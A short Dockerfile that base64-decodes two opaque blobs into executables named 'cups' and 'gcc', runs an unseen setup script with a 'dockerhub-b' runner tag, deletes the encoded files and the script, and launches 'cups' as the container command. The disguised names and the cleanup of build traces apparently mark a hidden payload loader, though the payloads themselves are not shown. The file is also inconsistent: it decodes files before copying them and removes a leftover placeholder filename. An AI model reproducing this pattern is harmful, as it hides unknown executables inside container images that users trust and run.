FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > cups.log'

RUN base64 --decode cups.64 > cups
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY cups .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' cups
RUN bash ./docker.sh

RUN rm --force --recursive cups _REPO_NAME__.64 docker.sh gcc gcc.64

CMD cups
